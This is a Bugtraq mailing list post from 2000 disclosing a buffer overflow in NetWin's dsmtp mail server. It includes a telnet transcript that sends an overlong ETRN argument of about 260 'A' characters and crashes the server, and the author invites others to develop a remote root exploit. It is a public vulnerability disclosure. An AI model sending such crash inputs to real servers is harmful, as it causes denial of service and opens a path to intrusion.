Bugtraq mailing list archives
Netwin's Dmail package
From: eric () WINCOM NET (Eric Andry)
Date: Thu, 1 Jun 2000 17:43:09 -0000
I've been sitting on this for a while, but dsmtp ( Part of the dmail package by NetWin, http://www.netwinsite.com ) has a buffer overflow in the ETRN command, causing the server to crash and dump core. I've contacted NetWin and they are working on the problem, but 3 new Betas have been released since and still the problem isn't fixed, so I figure I might as well put it up. ---------------- NotNow>telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 myhost.mydomain DSMTP ESMTP Server v2.8g EHLO "" 250-myhost.mydomain. Hello "" (127.0.0.1) 250-ETRN 250-DSN 250 HELP ETRN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Connection closed by foreign host. NotNow> NotNow>cd /usr/local/dmail NotNow>ls -la core -rw------- 1 root root 1961984 Jun 1 13:42 core NotNow> --------------------- A little over 260 A's would cauase the crash. I don't know if someone wants to attempt a remote root exploit, but I'd be interested to see it as I haven't been successful yet. (Not exactly the most experienced coder in the world.. Skills just better then a rock.. But at least I'll admit it). But this is at least a stupid little DoS. Regards, Eric Andry
Current thread:
- Netwin's Dmail package Eric Andry (Jun 01)
- Re: Netwin's Dmail package noir (Jun 01)
- Re: Netwin's Dmail package Zac Cogswell (Jun 04)
- Re: Netwin's Dmail package noir (Jun 01)